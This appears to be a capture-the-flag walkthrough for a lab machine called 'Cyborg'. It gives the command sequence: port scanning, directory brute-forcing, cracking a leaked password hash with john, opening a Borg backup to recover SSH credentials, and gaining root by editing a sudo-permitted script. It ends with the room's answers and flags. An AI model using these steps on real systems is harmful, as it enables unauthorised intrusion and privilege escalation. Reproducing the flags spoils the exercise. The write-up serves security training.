Cyborg
sudo openvpn WittyAle.ovpn
ping
ping 10.10.181.155
rustscan
rustscan -a 10.10.181.155 --ulimit 5000 -b 65535 -- -A
gobuster
gobuster dir --url http://10.10.181.155 -w /usr/share/wordlists/dirb/common.txt -t 30 -k -x py,html,txt
==/admin , /etc==
10.10.181.155/etc/squid/passwd
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
john
john --wordlist=/usr/share/wordlists/rockyou.txt passwd
john passwd --show
==cracked -> music_archive:squidward==
10.10.181.155/admin/admin.html download -> archive.tar
Borg Backup
tar -xf archive.tar
tree home
cd cyborg/home/field/dev
borg list final_archive
==passphrase: squidward==
borg list final_archive::music_archive
borg extract final_archive::music_archive
cat home/alex/Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"
cat home/alex/Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
ssh
ssh alex@10.10.181.155
priv esc
sudo -l
==(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh==
chmod 777 /etc/mp3backups/backup.sh
nano /etc/mp3backups/backup.sh
add #2 line -> sudo /bin/bash
sudo /etc/mp3backups/backup.sh
Scan the machine, how many ports are open? 2
What service is running on port 22? ssh
What service is running on port 80? http
What is the user.txt flag? flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
What is the root.txt flag? flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}
[[Blaster]]
Last updated
Was this helpful?